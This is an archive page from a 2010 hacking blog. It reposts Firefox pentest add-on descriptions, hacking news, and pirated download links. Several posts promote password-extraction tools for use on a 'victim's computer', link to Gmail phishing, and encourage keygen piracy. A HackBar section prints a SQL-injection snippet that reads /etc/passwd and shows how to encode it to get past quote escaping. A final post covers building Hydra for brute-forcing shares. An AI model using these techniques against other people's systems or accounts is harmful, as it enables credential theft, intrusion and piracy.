Email | Link Exchange | News | Phishing | SQL | SEO | Tools | | Tutorials | Penetration Testing | Trojans & Keyloggers | Videos

Share This Post With Your Friends

Showing newest 38 of 41 posts from 02/28/10. Show older posts
Showing newest 38 of 41 posts from 02/28/10. Show older posts

Saturday, March 6, 2010

Firefox extension which gives you encryption/decryption and hashing functionalities

Version 4.0
Works with Firefox: 1.5 – 3.0.*
Updated September 24, 2008
Developer Ronald van den Heetkamp
Rating Rated 5 out of 5 stars

FireEncrypter is an Firefox extension which gives you encryption/decryption and hashing functionalities right from your Firefox browser, mostly useful for developers or for education & fun.

The new FireEncrypter is ready! (v-3.0, this version contains the following ciphers:

- AES (Rijndael 128Bit)
- Affine
- Caesar
- XOR
- OTP (One Time Pad)
- Vigenere
- Rail Fence
- Morse Encoder
- MD2 Hashing
- MD5 Hashing
- SHA1 Hashing
- SHA256 Hashing
- SHA384 Hashing
- SHA512 Hashing
- Secure password generator.


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

How to hack websites and damage to a web application using Cross-Site Scripting (XSS) vulnerabilities: Its Add-ons for Firefox

Version 0.4.3
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 25, 2009
Developer Security Compass
Rating Rated 5 out of 5 stars

Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS). It does NOT currently test for stored XSS.rnrnThe tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.rnrnIf the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string.rnrnThe tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.rnrnYou can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking Web Servers, Tools and Softwares

How to hack websites using SQL Injection vulnerabilites. Download SQL Inject Me 0.4.4 for free: Its Add-ons for Firefox

Tool 1
Version 0.4.4
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 5, 2009
Developer Security Compass
Rating Rated 4 out of 5 stars

Tool 2
Version 1.3
Works with Firefox: 3.0 – 3.6a1pre
Updated July 21, 2009
Developer danielneto.com
Rating Rated 4 out of 5 stars

SQL Injection vulnerabilites can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is Firefox Extension used to test for SQL Injection vulnerabilities.

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

Tool 1: DOWNLOAD HERE

Tool 2: DOWNLOAD HERE

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ SQL injection

Access-Me used to test for Access vulnerabilities. Allow an attacker to access resources without being authenticated

Version 0.2.3
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 5, 2009
Developer Security Compass
Rating Rated 3 out of 5 stars

The current version of Access-Me is an Exploit-Me tool used to test some access vulnerabilities related to web applications. The tool works by sending several versions of the last page request. A request with the session removed will be sent. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

Simple security audit & Penetration test tool HackBar 1.4.2 download for free: Its Add-ons for Firefox

Version 1.4.2
Works with Firefox: 1.5 – 3.6.*
Updated May 13, 2009
Developer Johan Adriaans
Rating Rated 5 out of 5 stars

# In general
This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of google :)

# The advantages are:
- Even the most complicated urls will be readable
- The focus will stay on the textarea, so after executing the url (ctrl+enter) you can just go on typing / testing
- The url in textarea is not affected by redirects.
- I tend to use it as a notepad :)
- Useful tools like on the fly uu/url decoding etc.
- All functions work on the currently selected text.


# Load url ( alt a )
This loads the url of the current page into the textarea.

# Split url ( alt s )
When this button is clicked, the url/text in the textarea will be split into multiple lines using the ? and & character

# Execute ( alt x, ctrl enter )
This will execute the current url in the textarea, i mostly use ctrl+enter

# INT -1 ( alt - )
First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.

# INT +1 ( alt + )
Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.

# HEX -1 ( control alt - )
First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.

# HEX +1 ( control alt + )
Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.

# MD5 Hash ( alt m )
this is a standard hashing method, often used as an encryption method for passwords. It will MD5 hash the currently selected string.

# SHA-1/256
this is a standard hashing method, often used as an encryption method for passwords. It will SHA-1/256 hash the currently selected string.

# MySQL CHAR() ( alt y )
If quotes are escaped but you did find an SQL injection thats exploitable, you can use this button to convert lets say:
load_file('/etc/passwd') --> load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
Thus omiting the use of quotes to load a file.
You can also use this on
WHERE foo LIKE ('%bar%') --> WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))

# MsSQL CHAR() ( alt q )
Same story as MySQL CHAR(), MsSQL has a slightly different CHAR syntax
--> WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))

# Base64 encode / decode
Base64 encoding ( UU ) is often used to store data (like a return url etc.) This will help you to read those values.

# URLencode / decode
This will encode or decode the currently selected characters to url safe characters. I mostly use it to end a query with # (%23) when in a pseudo path where i cant use /* or --

And lots more ;) Go test it!


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Penetration Testing

Core Security Labs researcher Pedro Varangot has released a tool that impersonates a Twitter user's account, enabling an attacker to target that user's followers.

"The initial version executes attacks on Twitter, but Varangot says it can be extended to work against Facebook and other social networks," writes DarkReading's Kelly Jackson Higgins. "The tool is based on Core's Exomind, an experimental Python-based framework written to test social network, search engines, and instant messaging attacks."

"Varangot says the goal is to provide organizations with a tool for social networking security training, penetration testing, or just to show how these attacks could work," Higgins writes.

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

DoT orders STel to stop services in 3 circles: Security through Compliance OR Compliance through Security ??

DoT orders S Tel to stop services in 3 circles

To Watch click HERE

The question was raised long time back. Refer to the below question. Is the the flaw in the Sim or something else. 7 guys arrested for CDMA cloning. More security gaps awaited,,,

Posted 10 minutes ago in Linkedin by Pawan Kumar Singh, CISO, Tulip Telecom.

Security through Compliance OR Compliance through Security ??

The new telecom players in India are building up their infrastructure to be rolled out soon to avoid penalty by DoT (Department of Telecommunication). For most of these player Information Security is no where on the agenda. Such a planning shall obviously create a mess in a very short time and then the realization to build a policy based framework shall strike. There will be still a few players to whom the realization will come only when the legal and regulatory compliance comes to table. Is is shortsightedness or is it deliberate mess. Where are the visionary CEO's?

To share you views or Answer question, leave a comment or

S Tel Pvt Ltd, a joint venture between Siva Group (formerly Sterling Infotech Group) and BMIC Limited, a subsidiary of Bahrain Telecommunications Company (Batelco), announced its plans on 16 December, 2009 to launch its GSM mobile services in India. The company will commence operations beginning with the Himachal Pradesh telecom circle where services are expected to be launched soon. Telecom circles for which S Tel has licences are Odisha, Bihar & Jharkhand, Jammu & Kashmir, Assam and North East.

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ General Discussion

Friday, March 5, 2010

Labour MP Sarah McCarthy-Fry was forced to change her password after the hack attack on the social networking website.

She received a blank message with a link and when she clicked on it, the same message was sent to all 847 people following her account.

It is thought the link contained a virus.

It is thought the virus may be linked to a 'phishing' scam which hackers use to get hold of users' personal details.

Mrs McCarthy-Fry tweeted: 'Apologies to all my followers, I appear to have sent you all a direct message - please note -- it was not me.'

And yesterday she added: 'Password changed so hopefully no more phishing scams.'

As reported in The News, Mrs McCarthy-Fry, MP for Portsmouth North, was the first politician in our area to use Twitter, and she said the hacking incident won't put her off using the site.

'It is where I go for information and news about politics,' she said.'

She added: 'Fortunately it was just a blank message sent in my name and not anything else.'

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Hacker hits Iowa Homeland Security site

The Iowa Division of Homeland Security and Emergency Management shut down its Web site Wednesday night after a hacker gained access and defaced it, state officials said Thursday.

It was the second serious hacking incident within the past five weeks in state government. On Jan 26, a licensing database of the Iowa Racing and Gaming Commission was breached by a hacker, possibly from China, compromising personal data for 80,000 people.

No sensitive information was compromised within the Division of Homeland Security and Emergency Management, said Lucinda Robertson, an agency spokeswoman. But the Web site remained inaccessible Thursday while a forensic examination was conducted to determine how the breach occurred, she said.

Two other state Web sites — one for veterans and another for individual and family emergency preparedness — were also compromised.

The Iowa Division of Criminal Investigation is participating in the investigation, Robertson said.

Several outside experts said Thursday the two hacking incidents should be a wake-up call for state officials to strengthen their computer security efforts.

"What this does suggest is that maybe state government hasn't put cyber security at the top of their priorities," said Ryan Meyer, president of Meyer Technology Group in Des Moines.

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Learn How to Make Key Generators

To all crackers !!!

Well most of you have probably used a key generator or keygen as it is commonly called in internet slang. A keygen is a small program that will generate a key or serial/registration number for a piece of software. It is typically used as an adjunct to software piracy.

Here is a comprehensive guide, strictly for educational purposes, that shows you how a keygen is created to feed the hungry piracy lions Laughing


I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Cheats and CD Keys

Terrorists are pursuing hacking skills: FBI

The Federal Bureau of Investigation (FBI) has raised concern over the usage of internet by international criminals and terror organisations to bolster their attack on countries and their governments.

Speaking at an Internet security conference on Thursday, Mar 4, FBI director Robert Mueller warned about the growing threat of cyber crime and explained how a cyber attack could be as detrimental as a 'well-placed bomb'.


"Terrorists have shown a clear interest in pursuing hacking skills and they will either train their own recruits or hire outsiders with an eye toward combining physical attacks with cyber attacks," Mueller said.

"Apart from the terrorist threat, nation-states may use the Internet as a means of attack for political ends," he added.

Nation-state hackers or mercenaries for hire are seeking US' technology, intelligence, the intelluctual property along with information on military weapons and strategies, Mueller warned.

Mueller's statement take up more significance as it comes amid a slew of cyber attacks on government websites and computers.

From the hackers in Australia who wanted to protest against an internet filter, to the alleged hacking attempts from China targeting Indian government computers.

Internet major Google Inc's allegations of hacking against China has also become an international issue.

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Original gameplay for real hackers: Uplink Hackers Elite-Razor1911 download here for free


You play an Uplink Agent who makes a living by performing jobs for major corporations. Your tasks involve hacking into rival computer systems, stealing research data, sabotaging other companies, laundering money, erasing evidence, or framing innocent people.

You use the money you earn to upgrade your computer systems, and to buy new software and tools. As your experience level increases you find more dangerous and profitable missions become available. You can speculate on a fully working stock market (and even influence its outcome). You can modify peoples academic or criminal records. You can divert money from bank transfers into your own accounts. You can even take part in the construction of the most deadly computer virus ever designed.

Features:
  • Original gameplay: Players have the opportunity to be freelance hackers.
  • Freeform gameplay: Accept the missions that you want to play.
  • Neuromancer rating: Let your morals guide you; save the net or watch processors melt.
  • Uplink offers two totally different paths to ‘l33t’ hacker status.
  • Exciting missions: Crack a bank, hack a rival into jail, crash the stock market, and get out before you’re caught.
  • Thrilling action: Players have to make those last 15 seconds count and feel the tension rise, as their signal is traced.
  • Deep plot: The computer underground can be a dangerous place, especially if you’ve got to stop the world’s deadliest virus.
  • Choose your OS: Runs on Windows, Mac and Linux .

UPLINK MINIMUM SPECS

• Windows 98, 2000, XP, Vista or equivalent
• 600MHZ processor (1.6GHZ processor recommended)
• 128MB RAM (256MB RAM recommended)
• Geforce2 or greater (Geforce4 or greater recommended)
• 200MB hard disk space


DOWNLOAD HERE

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Games for Real Hackers

Hackers (1996) OST Original Soundtrack download here for free

* Found link while googling. I have not uploaded these files. PLS REPORT ANY BROKEN LINK on OR leave a comment here *
Doenload:
  1. http://rapidshare.com/files/77118216/hack.part1.rar
  2. http://rapidshare.com/files/77115586/hack.part2.rar
Pasword for RAR files: stanley01

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking Videos

Hackers: Outlaws and Angels - Discovery Channel: Download for free here

* Found link while googling. I have not uploaded these files. PLS REPORT ANY BROKEN LINK on OR leave a comment here *

Over the past 20 years a new breed of people has been evolving. They have their own culture, their own technology and their own languages. Among them are pirates and thieves, celebrities and philosophers, lawbreakers and police, heroes and villains. They operate all over the world but their real home is cyberspace. And now there's a conflict in cyberspace between its outlaws and its angels. This is the inside story of the very different missions which now drive the diverse breed of people known to the world as hackers.

DOWNLOAD HERE FULL SERIES
  1. http://rapidshare.com/files/65634894/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part1.rar
  2. http://rapidshare.com/files/65635127/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part2.rar
  3. http://rapidshare.com/files/65635444/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part3.rar
  4. http://rapidshare.com/files/65635763/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part4.rar
  5. http://rapidshare.com/files/65636336/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part5.rar
  6. http://rapidshare.com/files/65636996/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part6.rar
  7. http://rapidshare.com/files/65637249/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part7.rar
  8. http://rapidshare.com/files/65637378/Discovery.Hackers.Outlaws.and.Angels.XviD.AC3.www.mvgroup.org.part8.rar
Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking Videos

How to bypass a Keylogger: How to fool a Keylogger

These days Agents spy on u everywhere, in college, at work, maybe a trojan virus on your home PC which keylogs your paswords and mails it to someone else. If u think u r being logged, try this:

Whenever u have to type a password, never type the complete password in one go, ie, if your password is WINDOWS, u should type NDOW, then move cursor to start of the password field using the mouse ONLY, then type WI, then move cursor to end using the mouse and type S. This way the logger will record your keystrokes as ndowwis instead of WINDOWS.

Additionally you can also use spaces with you passwords as spaces are not readable. Use 2-3 spaces after or in the end (as prefix) for all your passwords. Gmail, yahoo and so many other services supports spaces in password field.

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking Tutorial: Basic Information

How to access blocked websites and How to protect your privacy online using Hotspot Shield

Hotspot Shield is a freeware which ensures anonymous and censor-free internet usage. With Hotspot Shield you can even access blocked websites. For example: Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, HotSpot Shield is is not an invasive adware or pervasive spyware application.

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. We love the web because of the freedom that it creates to explore, organize, and communicate. Hotspot Shield enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Hotspot Shield. Standard antivirus software protects your computer, but not your web activities.
  • Secure your web session, data, online shopping, and personal information online with HTTPS encryption.
  • Protect yourself from identity theft online.
  • Hide your IP address for your privacy online.
  • Access all content privately without censorship; bypass firewalls.
  • Protect yourself from snoopers at Wi-Fi hotspots, hotels, airports, corporate offices.

Hotspot Shield runs on:
  • Windows 7
  • Windows XP
  • Windows 2000
  • Windows Vista
  • Mac OS X (10.4 Tiger)
  • Mac OS X (10.5 Leopard)
  • Mac OS X (10.6 Snow Leopard)
DOWNLOAD HERE

Pls report any broken link

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Anonymous Surfing, Bypass proxy and firewall

Thursday, March 4, 2010

How to Recover Password for FTP: Hack FTP Account Passwords if you have physical access to victim's computer

Advanced FTP Password Recovery can be used to recover FTP server password stored by an ftp client. It works with any FTP client including Core FTP, CuteFTP, FileZilla, FlashFXP, SmartFTP, WinSCP, WS_FTP and many others. We guarantee your ftp password recovery provided the ftp password is saved in your FTP client (in other words you are able to login to your FTP server without having to enter the FTP password).


DOWNLOAD HERE





How to use Advanced FTP Password Recovery:
  1. Download FTP Password Recovery
  2. Run the downloaded file and install FTP Password Recovery, make sure you select Run Advanced FTP Password Recovery checkbox at the end of your setup
  3. Open your FTP Client
  4. Open connection properties (e.g. account manager)
  5. Remember current FTP server address. We advise you to write it down
  6. Change FTP server address to localhost. Change port to 21 (or 22, as indicated in Advanced FTP Password Recovery window)
  7. Repeat this for all necessary servers
  8. Confirm changes
  9. Try to connect to each server
  10. You will see captured passwords in Advanced FTP Password Recovery window
  11. Change back the original server addresses in your FTP client
For your convenience and fast recovery we have written detailed step-by-step guides for your specific FTP client:
  • CoreFTP password how-to-guide
  • CuteFTP password how-to guide
  • FileZilla password how-to guide
  • FlashFXP password how-to guide
  • FTP Commander how-to guide
  • SmartFTP password how-to guide
  • WinSCP password how-to guide
  • WS_FTP password how-to guide
Here's a full list of FTP clients that are supported:
  • 3D-FTP recover password
  • AbsoluteTelnet restore password
  • ALFTP retrieve password
  • BitKinex reveal password
  • BulletProof FTP get password
  • Classic FTP see saved password
  • CoffeeCup Direct FTP show password
  • CoffeeCup Free FTP find password
  • CoreFTP forgot password
  • CrossFTP change password
  • cURL passwort
  • CuteFTP intercept password
  • Directory Opus password sniffer
  • ExpanDrive password decrypter
  • FAR Manager password decoder
  • FileZilla password cracker
  • FireFTP password ripper
  • FlashFXP password stealer (local only)
  • Fling FTP password hacker (local only)
  • FTP Commander
  • FTP Explorer
  • FTP Voyager
  • Global Downloader
  • Glub Tech Secure FTP
  • LeechFTP
  • Mosaic
  • NcFTP
  • net2ftp
  • pbFtpClient
  • PSFTP
  • SFTPPlus
  • ScripFTP
  • SmartFTP
  • Sysax FTP Automation
  • WebDrive
  • WinSCP
  • WISE-FTP
  • WS_FTP
Extra recovery features:
  • All versions of FTP clients are supported
  • Support for multiple FTP accounts
  • Works through any Firewall
  • Opens alternative port if port 21 is used by another program
  • Recovery guaranteed!
If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Password Recovery Tools

How to Recover Password for Gmail & Google Talk : Hack Gmail & Google Talk Account Passwords if you have physical access to victim's computer

Password Recovery for Google is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords: Google Talk, Gmail Notifier, Google Desktop, Picasa, Google Photos Screensaver, Internet Explorer and Mozilla Firefox. This cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password.


To hack Gmail using fake page or by phishing attack click here
  • Reveal Google Talk password
  • Decode Google Talk passwords
  • Google Talk password restore
  • Show Google Talk password
  • Google Talk password finder
  • Forgot Google Talk password
  • Google Talk password recovery
  • Change Google Talk password
  • See saved Google Talk password
  • Google Talk passwort anzeigen
  • Google Talk password decrypter
  • How to get Google Talk password
  • Google Talk password cracker (only local data is cracked)
  • Retrieve Google Talk password
  • Rip Google Talk password (only local data files are ripped)
  • Google Talk password hacker (is also illegal)
  • Google Talk password stealer (is illegal)

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Password Recovery Tools

How to Recover Password for AIM (AOL Instant Messenger): Hack AIM (AOL) Account Passwords if you have physical access to victim's computer

AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PC under the current account. The passwords will then be cracked and decoded (decrypted) to display on the screen in a user-friendly format. Correct passwords will of course be displayed only if you are able to login automatically in AIM without entering your password for the account you want to recover. Works with the latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked.

DOWNLOAD HERE

This tool will be particularly useful when you want to change you AIM password that you forgot. Or if you want to migrate AIM to another PC but you have forgotten your AIM password. Lost AIM passwords have a chance to be recovered!

Functionality of AIM Password Recovery:
  • Decrypt AIM password (AOL Instant Messenger password decrypter)
  • Decode AOL Instant Messenger passwords (AIM password decoder)
  • Crack AOL Instant Messenger passwords (AOL Instant Messenger password cracker)
  • Recover AOL Instant Messenger password (AIM password recovery)
  • Find AIM passwords (AOL Instant Messenger password finder)
  • AOL Instant Messenger password ripper (rip AIM passwords)
  • AIM remote account hacker (not implemented)
  • AOL Instant Messenger password hacker (will hack AIM passwords for saved accounts only on local accounts)
  • AIM password stealer (not implemented) - please note that this tool should not be used to steal others' passwords. This is illegal action and can be prosecuted.
  • AIM password retriever (retrieve AIM passwords)
  • Multiple profiles (screen names) are supported
If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Password Recovery Tools

How to Recover Password for Windows Live: Hack Windows Live Account Passwords if you have physical access to victim's computer

Password Recovery for Windows Live is the tool that will instantly find, decrypt & recover Windows Live passwords that were saved by Windows Live Messenger on your PC under the current login. Extremely useful when you want to change Windows Live password but do not remember your old password. This program is guaranteed to work if you can login with your messenger automatically without entering your password after clicking on the "Sign-In" button. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved on your PC.

Windows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that were saved by Windows Live Messenger on your PC under the current login. This cracker works when you are able to login with your messenger automatically without entering your password. It will recover multiple accounts and supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows 7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved on your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.

DOWNLOAD HERE

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Password Recovery Tools

How to Recover Password for MSN: Hack MSN, Hotmail Account Passwords if you have physical access to victim's computer

MSN Messenger Password Recovery is the MSN password finder that instantly cracks and decrypts the MSN Passwords and Windows Messenger passwords stored on your computer. It can be used to recover your forgotten MSN password. Program works when the "Remember my Password" tickbox is checked in the messenger and you're able to login automatically without entering your password. All versions of MSN Messenger and Windows Messenger are supported. Multiple accounts are also supported.


DOWNLOAD HERE




Functionality of MSN Password Recovery program:
  • MSN password decrypter (decrypt MSN Messenger password)
  • MSN passwords decoder (MSN password decoder)
  • MSN password cracker (crack MSN Messenger password)
  • Recover MSN Messenger password (MSN password recovery)
  • MSN password finder (find MSN Messenger passwords)
  • MSN Messenger password ripper (rip MSN passwords)
  • MSN password hack (will hack MSN passwords for saved accounts only on local accounts)
  • MSN remote account hacker (not implemented)
  • MSN password stealer (steal MSN messenger passwords) - please note that this tool should not be used to steal others' passwords. This is illegal action and can be prosecuted.
  • MSN password retriever (retrieve MSN password)
  • Multiple profiles (MSN ID's) are supported
If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Password Recovery Tools

We don't need no stinking exploits: Hacking human gullibility with social penetration

Security penetration testers Mike Bailey and Mike Murray rely plenty on attacks that exploit weaknesses in websites and servers, but their approach is better summed up by the famous phrase "There's a sucker born every minute."

That's because so-called social penetration techniques are more reliable and easier to use in identifying chinks in client fortresses, the principals of Mad Security said Wednesday. That's true even for organizations that place a high premium on security and train their employees to resist the most common attempts to trick them into letting down their guard.

"I like finding those elite little exploits where they'll bounce things off eight different websites through cross-site request forgery and cross-site scripting attacks," Bailey said Wednesday at the BSides security conference in San Francisco. "I've never actually needed it in a pentest, because all you have to do is send them a malicious link" or crafty email.

Bailey said he regularly sends client employees emails informing them the strength of their login passwords is being tested through a new website. They are then instructed to follow a link and enter their credentials. The success rate: as high as 50 percent.

The vulnerability stems from humans' inherent tendency to trust one another. Survival over the millennia largely depended on their ability to work in groups. When one person saw that a group of his peers ate a particular berry and didn't die, he ate the same fruit - and survived as a result. Hackers who understand this trait can exploit it to access companies' most precious assets.

"The social part of our industry, we are never going to patch," Murray said. "We need to have our whole industry understand this. This is what all social attacks are about."

During their hour-long talk, the pair described the most common social penetration methods, which can be found in everything from 419 email scams to trojan attacks that succeed only when a victim clicks on a malicious link.

The come-ons often invoke a sense of urgency, such as an opportunity to make money only if the mark moves quickly. Scammers often try to form perceived bonds with their victims by thanking them for their attention or apologizing for an interruption. The ruses amount to hacks that suspend the marks' critical faculties just long enough to get them to make a critical mistake.

Bailey employed a similar trick last year, when he and two other ethical hackers claimed a $10,000 prize for breaking into the email account of StrongWebMail CEO Darren Berkovitz.

The XSS, or cross-site scripting, vulnerability they identified could only be exploited if the victim clicked on a link while logged in to his account. The solution: They sent him an email with the subject line "we think we've already won this contest," with the attack link in the body. Berkovitz took the bait, and they won the prize.

The technique works even on firms and individuals that regard themselves as especially security savvy, although the tricks often must be tailored to them, Murray warned.

"They spend all this time talking about security," he explained. "If I send them an email saying 'Do the right thing for security,' they say OK, and we own them. The things that normally work in most organizations don't work on them, but if you figure out what works on them, they're as easy to own as anybody else, no matter how intense their preparation is."

For full story click here

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Social Engineering

New Hacking Trend: Cybercrime Goes Virtual. Hackers are employing phishing attacks to snare access data for user accounts for online role-playing game

Cybercrime is going virtual. Hackers are employing phishing attacks to snare access data for user accounts for online role-playing games. They then use the plundered passwords to transfer away virtual swords and other gear. Because the objects often demand a great deal of time to earn, once stolen they can then be resold for a significant profit.

Computer gamers are increasingly finding that there's a serious side to their virtual fun: their hard-earned virtual objects are being stolen from them, and in some cases their entire game as well.

The trend was first reported in an article by Hamburg-based Computer Bild magazine. On the one hand, hackers are employing phishing attacks to snare access data for user accounts for online role playing games.

They then use the plundered passwords to transfer away virtual swords and other gear. Because the objects often demand a great deal of time to earn, once stolen they can then be resold for a significant profit.

The magazine also notes that hackers are also trying to steal away an entire game. Many titles require gamers to register online for copyright protection purposes.

If hackers can sniff out the passwords, they can then assume control of the account and by extension the game itself. If the hacker then changes the access data, the original purchaser can no longer access his or her own user account and is shut out from playing the game.

One trick used to spy on users' passwords are so-called "drive-by downloads." Hackers lure players to a rigged Web site by promising additional functionality in the game.

But the software offered for download there actually contains a Trojan that allows hackers to spy on the infected computer. Sometimes security holes in the browser are also exploited to sneak the malicious software onto the host computer.

SOURCE: News Factor

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Phishing Attack

Wednesday, March 3, 2010

How to use Hydra tool: Identify Open Shared Resources from open port 139 using software Hydra

The Hydra application will scan a range of IP addresses and identify any open shares from open port 139. Open shares are shares without passwords assigned to them, of which the majority allows anyone to copy, move, delete, and quite often add to the share. Not all shares are left unprotected and Hydra has the ability to brute-force its way into the share given a username and password list combination.

From the directory containing the compressed Hydra files type tar –zxvf hydra-5.0-src.tar.gz.

The files will uncompress into a new directory named hydra-5.0-src. Change to the new directory by typing cd hydra-5.0-src and pressing Enter.

Hydra needs to be compiled for the specific machine it is on. This is done by typing ./configure. Hydra will compile to the specific machine. The next step is to create Hydra by typing the make command.
The make command will execute and attempt to create the xhydra for Linux X. To start Hydra in X type:

./xhydra
